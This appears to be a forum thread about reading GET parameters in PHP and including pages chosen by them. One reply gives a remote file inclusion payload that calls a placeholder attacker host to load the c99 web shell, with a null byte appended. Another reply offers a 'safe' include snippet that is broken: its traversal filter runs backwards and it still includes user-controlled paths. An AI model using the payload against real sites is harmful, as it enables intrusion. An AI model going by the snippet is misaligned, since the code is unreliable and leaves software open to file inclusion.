• how do i use url parameters?
    38 replies, posted
[QUOTE=Wipmuck;19314295]rm = unix/linux command for remove -f skips any prompts -r deletes all the files in the dir[/QUOTE] Sorry, it's actually remove all files recursively.
[QUOTE=turby;19317993]-r = recursive IIRC [editline]04:57PM[/editline] crapscript.php?s=http://evilsite.com/c99.php%00 bam, remote file inclusion right there[/QUOTE] Nope, unless the remote server's php configuration allows remote scripts to include their files, then you wont have an issue, however; I did neglect to add protection from ../ in that example. So, here: [php] <?php $site = $_GET['s']; // Gets the site from the url ex. ?s=[b]this[/b] $site = str_replace('../', ' ', $count); // Replace ../ with a whitespace and set the number of instances replaced to int $count if($count){ // Check if $count has a number greater than null or 0 if(file_exists($site .'.html')){ // If the html file for the site exists include($site .'.html'); // Include the file } else{ // If the file doesn't exist die("File not found.."); // Stop running the php file, and print "File not found..." } } else{ die("Invalid Page"); // Stop running the php file if they have put ?s=../somefile.html } ?> [/php]
Why would you replace it with a space, why not use ""?
People, why are you still bumping this thread? I got the help i requested.
[QUOTE=no-named;19339141]People, why are you still bumping this thread? I got the help i requested.[/QUOTE] Because you don't own the forum, nor control what happens. I was asking a question.
Am I the only one always having trouble directly specifying GET data, without checking if it exists first? Without a decent error reporting, I believe you'd have to do something like this [php] <?php $strGetData = ""; if (isset($_GET["getdata"])) $strGetData = $_GET["getdata"]; if ($strGetData != "") { echo $strGetData; } ?> [/php] Feel free to correct me if I'm wrong on this.
[php] <?php if(isset($_GET['data']) && !empty($_GET['data'])){ echo $_GET['data']; } ?> [/php] emptyempty() == empty().
[QUOTE=compwhiziitothemax;19301998]How that piece of code is even working is beyond me.[/QUOTE] PHP has this "nice feature" that unknown constants emit a notice (or warning?), and then evalutes to the name of the constant. With . as the string concatenation operator, that this code is basically include $site . 'html'; Don't we all love PHP? :sigh:
[QUOTE=itsbth;19451904]PHP has this "nice feature" that unknown constants emit a notice (or warning?), and then evalutes to the name of the constant. With . as the string concatenation operator, that this code is basically include $site . 'html'; Don't we all love PHP? :sigh:[/QUOTE] :psyboom:
Sorry, you need to Log In to post a reply to this thread.